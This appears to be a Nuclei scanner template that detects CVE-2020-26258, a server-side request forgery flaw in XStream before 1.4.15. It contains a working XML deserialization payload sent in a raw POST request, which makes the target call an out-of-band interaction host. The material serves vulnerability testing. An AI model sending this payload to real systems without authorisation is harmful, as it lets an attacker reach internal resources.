id: CVE-2020-26258

info:
  name: XStream < 1.4.15 - Server-Side Request Forgery
  author: pwnhxl
  severity: high
  description: |
    In XStream before version 1.4.15, a Server-Side Request Forgery vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream.
  reference:
    - https://x-stream.github.io/CVE-2020-26258.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
    - https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2020-26258
    cwe-id: CWE-918
  tags: cve,cve2020,xstream,ssrf,oast

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <map>
          <entry>
            <jdk.nashorn.internal.objects.NativeString>
              <flags>0</flags>
              <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
                <dataHandler>
                  <dataSource class='javax.activation.URLDataSource'>
                    <url>http://{{interactsh-url}}/internal/:</url>
                  </dataSource>
                  <transferFlavors/>
                </dataHandler>
                <dataLen>0</dataLen>
              </value>
            </jdk.nashorn.internal.objects.NativeString>
            <string>test</string>
          </entry>
        </map>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"